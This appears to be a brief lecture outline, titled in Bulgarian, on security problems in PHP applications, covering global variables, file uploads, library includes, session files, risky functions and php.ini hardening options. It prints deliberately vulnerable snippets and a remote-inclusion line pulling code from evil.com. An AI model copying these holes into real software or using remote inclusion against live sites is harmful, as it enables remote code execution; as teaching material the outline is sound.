Проблеми със сигурността в PHP приложения
-----------------------------------------

Based on http://www.securereality.com.au/studyinscarlet.txt      

      - Global Variables
if ($password = "secret")
  $authenticated = 1;

if ($authenticated) {
  // Do secret stuff
}
      - Remote Files

require("")...
include("http://www.evil.com/blah.php");

      - File Upload (old style)

<FORM METHOD="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="FILE" NAME="up">
<INPUT TYPE="SUBMIT">
</FORM>

$up = Filename on local machine ("/tmp/phpxXuoXG")
$up_size = Size in bytes of file (e.g 1024)
$up_name = The original name of the file on the remote system (e.g"/home/gf/blah.txt")
$up_type = Mime type of uploaded file (e.g "text/plain")

      - Library Files

In file1.php
<?
  $lang = "bg";
  include("$lang/loadlanguage.php");
?>

In loadlanguage.php
<?
 // Do some initialization
 include("$lang/definitions.php");
?>

      - Session Files
- Files owned by server uid
- Stored in /tmp

      - Loose Typing And Associative Arrays
Diffrences between $data[0] and $data["000"]

      - Target Functions
         - require, include
         - eval
         - exec, passthru, ``, system, popen
         - fopen, readfile, file
      - Protecting PHP
         - safe_mode
         - open_basedir
         - register_globals
         - allow_url_fopen
         - disable_functions
         - file_uploads
         - magic_quotes_gpc
         - display_errors
         - log_errors